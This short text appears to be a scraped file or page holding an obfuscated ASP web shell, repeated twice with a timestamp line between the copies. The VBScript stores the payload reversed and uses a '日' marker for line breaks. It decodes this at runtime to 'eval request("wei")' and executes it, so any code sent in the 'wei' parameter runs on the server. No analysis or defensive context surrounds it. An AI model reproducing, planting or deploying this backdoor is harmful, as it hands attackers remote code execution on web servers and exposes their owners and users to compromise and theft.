<% wei="日日日)""wei""(tseuqer lave 日" execute(UnEncode(wei)) function UnEncode(cc) for i = 1 to len(cc) if mid(cc,i,1)<>"日" then temp = Mid(cc, i, 1) + temp else temp=vbcrlf&temp end if next UnEncode=temp end function %>
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时间: 2024-12-20 17:38:49
<% wei="日日日)""wei""(tseuqer lave 日" execute(UnEncode(wei)) function UnEncode(cc) for i = 1 to len(cc) if mid(cc,i,1)<>"日" then temp = Mid(cc, i, 1) + temp else temp=vbcrlf&temp end if next UnEncode=temp end function %>
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